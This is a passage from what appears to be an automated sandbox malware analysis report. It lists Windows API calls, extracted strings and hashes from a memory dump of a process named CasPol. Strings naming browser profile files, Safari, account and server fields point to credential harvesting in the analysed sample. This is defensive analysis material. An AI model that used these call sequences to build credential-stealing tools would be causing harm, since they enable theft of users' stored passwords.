                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1936579350-0
                                                                                                                  • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                  • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                  • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                  • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1294909896-0
                                                                                                                  • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                  • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                  • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                  • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1294909896-0
                                                                                                                  • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                  • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                  • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                  • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1294909896-0
                                                                                                                  • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                  • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                  • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                  • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                  APIs
                                                                                                                  • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                  • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                  • GetLastError.KERNEL32 ref: 00409974
                                                                                                                  • CloseClipboard.USER32 ref: 0040997D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3604893535-0
                                                                                                                  • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                  • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                  • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                  • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                  APIs
                                                                                                                  • EmptyClipboard.USER32 ref: 00409882
                                                                                                                  • wcslen.MSVCRT ref: 0040988F
                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                  • CloseClipboard.USER32 ref: 004098D7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1213725291-0
                                                                                                                  • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                  • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                  • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                  • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                  • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                  • free.MSVCRT ref: 00418370
                                                                                                                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                  • String ID: OsError 0x%x (%u)
                                                                                                                  • API String ID: 2360000266-2664311388
                                                                                                                  • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                  • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                  • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                  • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                  APIs
                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Version
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1889659487-0
                                                                                                                  • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                  • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                  • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                  • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                  APIs
                                                                                                                  • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                  • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                  • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                  • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                  • memset.MSVCRT ref: 0040265F
                                                                                                                  • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                  • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                  • API String ID: 577499730-1134094380
                                                                                                                  • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                  • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                  • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                  • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                  • String ID: :stringdata$ftp://$http://$https://
                                                                                                                  • API String ID: 2787044678-1921111777
                                                                                                                  • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                  • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                  • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                  • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                  • GetDC.USER32 ref: 004140E3
                                                                                                                  • wcslen.MSVCRT ref: 00414123
                                                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                  • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                  • _snwprintf.MSVCRT ref: 00414244
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                  • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                  • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                                                  • API String ID: 2080319088-3046471546
                                                                                                                  • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                  • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                  • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                  • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                  APIs
                                                                                                                  • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                  • memset.MSVCRT ref: 00413292
                                                                                                                  • memset.MSVCRT ref: 004132B4
                                                                                                                  • memset.MSVCRT ref: 004132CD
                                                                                                                  • memset.MSVCRT ref: 004132E1
                                                                                                                  • memset.MSVCRT ref: 004132FB
                                                                                                                  • memset.MSVCRT ref: 00413310
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                  • memset.MSVCRT ref: 004133C0
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                  • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                  • wcscpy.MSVCRT ref: 0041341F
                                                                                                                  • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                  • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                  Strings
                                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                  • {Unknown}, xrefs: 004132A6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                  • API String ID: 4111938811-1819279800
                                                                                                                  • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                  • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                  • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                  • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                  • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                  • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                  • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                  • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                  • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 829165378-0
                                                                                                                  • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                  • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                  • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                  • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00404172
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                  • wcscpy.MSVCRT ref: 004041D6
                                                                                                                  • wcscpy.MSVCRT ref: 004041E7
                                                                                                                  • memset.MSVCRT ref: 00404200
                                                                                                                  • memset.MSVCRT ref: 00404215
                                                                                                                  • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                  • wcscpy.MSVCRT ref: 00404242
                                                                                                                  • memset.MSVCRT ref: 0040426E
                                                                                                                  • memset.MSVCRT ref: 004042CD
                                                                                                                  • memset.MSVCRT ref: 004042E2
                                                                                                                  • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                  • wcscpy.MSVCRT ref: 00404311
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                  • API String ID: 2454223109-1580313836
                                                                                                                  • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                  • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                  • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                  • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                  • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                  • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                  • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                  • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                  • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                  • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                  • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                    • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                    • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                  • API String ID: 4054529287-3175352466
                                                                                                                  • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                  • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                  • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                  • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                  • API String ID: 667068680-2887671607
